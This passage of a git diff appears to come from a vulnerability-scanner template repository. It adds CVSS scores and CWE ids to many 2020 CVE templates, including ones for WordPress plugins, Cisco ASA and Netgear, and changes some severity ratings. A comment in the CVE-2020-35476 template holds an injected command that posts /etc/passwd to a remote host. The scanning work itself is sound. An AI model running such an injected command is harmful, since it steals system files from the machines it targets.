https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/ - https://nvd.nist.gov/vuln/detail/CVE-2020-26153 tags: cve,cve2020,xss,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-26153 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml index d3d76d844b..0ebba2ba0c 100644 --- a/cves/2020/CVE-2020-26214.yaml +++ b/cves/2020/CVE-2020-26214.yaml @@ -11,6 +11,11 @@ info: - https://tools.ietf.org/html/rfc4513#section-5.1.2 - https://pypi.org/project/alerta-server/8.1.0/ tags: cve,cve2020,alerta + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26214 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index b9efcf09b6..18174b37ea 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -9,6 +9,10 @@ info: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ tags: cve,cve2020,netgear,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26919 requests: - raw: diff --git a/cves/2020/CVE-2020-26948.yaml b/cves/2020/CVE-2020-26948.yaml index 54d281ece9..6367027877 100644 --- a/cves/2020/CVE-2020-26948.yaml +++ b/cves/2020/CVE-2020-26948.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/btnz-k/emby_ssrf description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter. tags: cve,cve2020,emby,jellyfin,ssrf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26948 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2020/CVE-2020-27361.yaml b/cves/2020/CVE-2020-27361.yaml index cc00677a99..800de254e4 100644 --- a/cves/2020/CVE-2020-27361.yaml +++ b/cves/2020/CVE-2020-27361.yaml @@ -7,6 +7,11 @@ info: description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories. reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/ tags: cve,cve2020,akkadian,listing,exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-27361 + cwe-id: CWE-668 requests: - method: GET diff --git a/cves/2020/CVE-2020-27735.yaml b/cves/2020/CVE-2020-27735.yaml index 31b0f18651..dc84ec8031 100644 --- a/cves/2020/CVE-2020-27735.yaml +++ b/cves/2020/CVE-2020-27735.yaml @@ -8,6 +8,11 @@ info: An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735 tags: cve,cve2020,xss,wing-ftp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-27735 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml index cc13503b5f..81151b66a4 100644 --- a/cves/2020/CVE-2020-27866.yaml +++ b/cves/2020/CVE-2020-27866.yaml @@ -11,6 +11,11 @@ info: - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-27866 + cwe-id: CWE-288 requests: - raw: diff --git a/cves/2020/CVE-2020-27982.yaml b/cves/2020/CVE-2020-27982.yaml index 91159315d6..f46b932a44 100644 --- a/cves/2020/CVE-2020-27982.yaml +++ b/cves/2020/CVE-2020-27982.yaml @@ -6,6 +6,11 @@ info: description: IceWarp 11.4.5.0 allows XSS via the language parameter. reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html tags: cve,cve2020,xss,icewarp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-27982 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml index dcb73a8bf5..d33b9d2de3 100644 --- a/cves/2020/CVE-2020-27986.yaml +++ b/cves/2020/CVE-2020-27986.yaml @@ -3,13 +3,18 @@ id: CVE-2020-27986 info: name: SonarQube unauth author: pikpikcu - severity: medium + severity: high description: | SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ tags: cve,cve2020,sonarqube + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-27986 + cwe-id: CWE-306,CWE-312 requests: - method: GET diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index e511013c53..45c1ee460a 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -10,6 +10,11 @@ info: - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ tags: cve,cve2020,terramaster,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-28188 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml index e320eb589c..135292b076 100644 --- a/cves/2020/CVE-2020-28208.yaml +++ b/cves/2020/CVE-2020-28208.yaml @@ -7,6 +7,11 @@ info: description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. reference: https://trovent.io/security-advisory-2010-01 tags: cve,cve2020,rockethchat + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-28208 + cwe-id: CWE-203 requests: - raw: diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index 4e77e68e53..d8708d874c 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -10,6 +10,11 @@ info: - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://www.exploit-db.com/exploits/48980 tags: cve,cve2020,monitorr,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-28871 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index 3ecd474e88..a271437130 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -3,12 +3,17 @@ id: CVE-2020-28976 info: name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) author: LogicalHunter - severity: high + severity: medium description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-28976 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2020/CVE-2020-29164.yaml b/cves/2020/CVE-2020-29164.yaml index 753c1c727b..9ff125238d 100644 --- a/cves/2020/CVE-2020-29164.yaml +++ b/cves/2020/CVE-2020-29164.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: pacsone,xss,cve,cve2020 reference: https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-29164 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml index 469d3e038c..b22baeb363 100644 --- a/cves/2020/CVE-2020-29227.yaml +++ b/cves/2020/CVE-2020-29227.yaml @@ -3,12 +3,16 @@ id: CVE-2020-29227 info: name: Car Rental Management System 1.0 - Local File Inclusion (LFI) author: daffainfo - severity: high + severity: critical description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution. reference: - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 - https://nvd.nist.gov/vuln/detail/CVE-2020-29227 tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-29227 requests: - method: GET diff --git a/cves/2020/CVE-2020-29395.yaml b/cves/2020/CVE-2020-29395.yaml index 1072df2e03..ca81ff5115 100644 --- a/cves/2020/CVE-2020-29395.yaml +++ b/cves/2020/CVE-2020-29395.yaml @@ -9,6 +9,11 @@ info: - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS - https://nvd.nist.gov/vuln/detail/CVE-2020-29395 tags: cve,cve2020,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-29395 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml index 3e39b3447e..447eb86dbf 100644 --- a/cves/2020/CVE-2020-29453.yaml +++ b/cves/2020/CVE-2020-29453.yaml @@ -7,6 +7,11 @@ info: description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. reference: https://jira.atlassian.com/browse/JRASERVER-72014 tags: cve,cve2020,atlassian,jira,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-29453 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-3187.yaml b/cves/2020/CVE-2020-3187.yaml index 346ae735d7..10db5b0e82 100644 --- a/cves/2020/CVE-2020-3187.yaml +++ b/cves/2020/CVE-2020-3187.yaml @@ -3,13 +3,18 @@ id: CVE-2020-3187 info: name: CVE-2020-3187 author: KareemSe1im - severity: high + severity: critical description: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. reference: - https://twitter.com/aboul3la/status/1286809567989575685 - http://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43 tags: cve,cve2020,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2020-3187 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-3452.yaml b/cves/2020/CVE-2020-3452.yaml index 1a5f9d3e7f..5ffc08cf18 100644 --- a/cves/2020/CVE-2020-3452.yaml +++ b/cves/2020/CVE-2020-3452.yaml @@ -3,7 +3,7 @@ id: CVE-2020-3452 info: name: CVE-2020-3452 author: pdteam - severity: medium + severity: high description: | A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. reference: @@ -14,6 +14,11 @@ info: - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 tags: cve,cve2020,cisco,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-3452 + cwe-id: CWE-20 requests: - method: GET diff --git a/cves/2020/CVE-2020-35338.yaml b/cves/2020/CVE-2020-35338.yaml index 2470e2c195..205fad22a0 100644 --- a/cves/2020/CVE-2020-35338.yaml +++ b/cves/2020/CVE-2020-35338.yaml @@ -10,6 +10,11 @@ info: - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa tags: cve,cve2020,wmt,default-login + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35338 + cwe-id: CWE-798 requests: - method: GET path: diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index a73f95890b..a84417bce6 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -10,6 +10,11 @@ info: # Extracting /etc/passwd to remote host:- # /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20--post-file%20/etc/passwd%20http://my-host%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35476 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index bac1875c05..e183ae1ea7 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -7,6 +7,11 @@ info: description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35489 tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-35489 + cwe-id: CWE-434 requests: - method: GET diff --git a/cves/2020/CVE-2020-35580.yaml b/cves/2020/CVE-2020-35580.yaml index c5fa22a091..1f23d2e4e6 100644 --- a/cves/2020/CVE-2020-35580.yaml +++ b/cves/2020/CVE-2020-35580.yaml @@ -7,6 +7,11 @@ info: description: Local File Inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users. reference: https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35580 + cwe-id: CWE-522 requests: - method: GET diff --git a/cves/2020/CVE-2020-35598.yaml b/cves/2020/CVE-2020-35598.yaml index fe1febddde..435cffabbd 100644 --- a/cves/2020/CVE-2020-35598.yaml +++ b/cves/2020/CVE-2020-35598.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/49343 - https://www.cvedetails.com/cve/CVE-2020-35598 tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35598 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml index a5e9540ba2..fd466fe1a3 100644 --- a/cves/2020/CVE-2020-35713.yaml +++ b/cves/2020/CVE-2020-35713.yaml @@ -7,6 +7,11 @@ info: reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. tags: cve,cve2020,linksys,rce,oob,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35713 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml index f0af5aa3ab..632c7a5aad 100644 --- a/cves/2020/CVE-2020-35729.yaml +++ b/cves/2020/CVE-2020-35729.yaml @@ -19,6 +19,11 @@ info: Originated from Metasploit module, copyright (c) space-r7. tags: cve,cve2020,klog,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35729 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-35736.yaml b/cves/2020/CVE-2020-35736.yaml index c2bfce5c8b..377a1e0aa0 100644 --- a/cves/2020/CVE-2020-35736.yaml +++ b/cves/2020/CVE-2020-35736.yaml @@ -9,6 +9,11 @@ info: - https://github.com/liftoff/GateOne/issues/747 - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 tags: cve,cve2020,gateone,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35736 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-35774.yaml b/cves/2020/CVE-2020-35774.yaml index e772c16eec..072b62d728 100644 --- a/cves/2020/CVE-2020-35774.yaml +++ b/cves/2020/CVE-2020-35774.yaml @@ -8,6 +8,11 @@ info: server/handler/HistogramQueryHandler.scala in Twitter TwitterServer (aka twitter-server) before 20.12.0, in some configurations, allows XSS via the /histograms endpoint. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35774 tags: cve,cve2020,xss,twitter-server + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-35774 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-3580.yaml b/cves/2020/CVE-2020-3580.yaml index af6da1dcfa..8b32f9ef9f 100644 --- a/cves/2020/CVE-2020-3580.yaml +++ b/cves/2020/CVE-2020-3580.yaml @@ -10,6 +10,11 @@ info: description: | Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. tags: cve,cve2020,xss,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-3580 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2020/CVE-2020-35846.yaml b/cves/2020/CVE-2020-35846.yaml index 35f6119a3c..2cb08ab7d4 100644 --- a/cves/2020/CVE-2020-35846.yaml +++ b/cves/2020/CVE-2020-35846.yaml @@ -9,6 +9,11 @@ info: The $eq operator matches documents where the value of a field equals the specified value. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ tags: cve,cve2020,nosqli,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35846 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-35847.yaml b/cves/2020/CVE-2020-35847.yaml index 2226a19d6f..9d33adc30f 100644 --- a/cves/2020/CVE-2020-35847.yaml +++ b/cves/2020/CVE-2020-35847.yaml @@ -9,6 +9,11 @@ info: which is responsible for changing the user password using the reset token. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ tags: cve,cve2020,nosqli,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35847 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-35848.yaml b/cves/2020/CVE-2020-35848.yaml index 9e693b11c7..3b1a7d649a 100644 --- a/cves/2020/CVE-2020-35848.yaml +++ b/cves/2020/CVE-2020-35848.yaml @@ -9,6 +9,11 @@ info: which is responsible for displaying the user password reset form. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ tags: cve,cve2020,nosqli,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35848 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-35951.yaml b/cves/2020/CVE-2020-35951.yaml index 835ccc29ed..0ab49a2bc9 100644 --- a/cves/2020/CVE-2020-35951.yaml +++ b/cves/2020/CVE-2020-35951.yaml @@ -8,6 +8,11 @@ info: An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H + cvss-score: 9.90 + cve-id: CVE-2020-35951 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml index def510535d..474b9b212a 100644 --- a/cves/2020/CVE-2020-36112.yaml +++ b/cves/2020/CVE-2020-36112.yaml @@ -9,6 +9,11 @@ info: - https://www.tenable.com/cve/CVE-2020-36112 severity: critical tags: cve,cve2020,sqli,cse + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-36112 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2020/CVE-2020-36289.yaml b/cves/2020/CVE-2020-36289.yaml index 9b1cb65ed5..134c4160f8 100644 --- a/cves/2020/CVE-2020-36289.yaml +++ b/cves/2020/CVE-2020-36289.yaml @@ -9,6 +9,11 @@ info: reference: - https://twitter.com/ptswarm/status/1402644004781633540 - https://nvd.nist.gov/vuln/detail/CVE-2020-36289 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-36289 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2020/CVE-2020-4463.yaml b/cves/2020/CVE-2020-4463.yaml index cff4fd841a..96e904d323 100644 --- a/cves/2020/CVE-2020-4463.yaml +++ b/cves/2020/CVE-2020-4463.yaml @@ -14,6 +14,11 @@ info: - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463 - https://github.com/Ibonok/CVE-2020-4463 tags: cve,cve2020,ibm,xxe + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L + cvss-score: 8.20 + cve-id: CVE-2020-4463 + cwe-id: CWE-611 requests: - method: POST diff --git a/cves/2020/CVE-2020-5284.yaml b/cves/2020/CVE-2020-5284.yaml index 90ae483682..97a56c996e 100644 --- a/cves/2020/CVE-2020-5284.yaml +++ b/cves/2020/CVE-2020-5284.yaml @@ -9,6 +9,11 @@ info: reference: https://github.com/zeit/next.js/releases/tag/v9.3.2 https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2020-5284 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml index 6107fbb57a..160406214c 100644 --- a/cves/2020/CVE-2020-5307.yaml +++ b/cves/2020/CVE-2020-5307.yaml @@ -8,6 +8,11 @@ info: - https://cinzinga.com/CVE-2020-5307-5308/ severity: critical tags: cve,cve2020,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5307 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2020/CVE-2020-5405.yaml b/cves/2020/CVE-2020-5405.yaml index a103e34d12..4a7aa0348f 100644 --- a/cves/2020/CVE-2020-5405.yaml +++ b/cves/2020/CVE-2020-5405.yaml @@ -3,10 +3,15 @@ id: CVE-2020-5405 info: name: Spring Cloud Directory Traversal author: harshbothra_ - severity: high + severity: medium description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. reference: https://pivotal.io/security/cve-2020-5405 tags: cve,cve2020,lfi,springcloud + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2020-5405 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-5410.yaml b/cves/2020/CVE-2020-5410.yaml index 773e721bae..d4f7de242d 100644 --- a/cves/2020/CVE-2020-5410.yaml +++ b/cves/2020/CVE-2020-5410.yaml @@ -7,6 +7,11 @@ info: description: Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack. reference: https://tanzu.vmware.com/security/cve-2020-5410 tags: cve,cve2020,lfi,springcloud + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-5410 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-5412.yaml b/cves/2020/CVE-2020-5412.yaml index a0b1eac7af..dad8fbb3f9 100644 --- a/cves/2020/CVE-2020-5412.yaml +++ b/cves/2020/CVE-2020-5412.yaml @@ -7,6 +7,11 @@ info: description: Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6, and older unsupported versions allow applications to use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. A malicious user, or attacker, can send a request to other servers that should not be exposed publicly. tags: cve,cve2020,ssrf,springcloud reference: https://tanzu.vmware.com/security/cve-2020-5412 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + 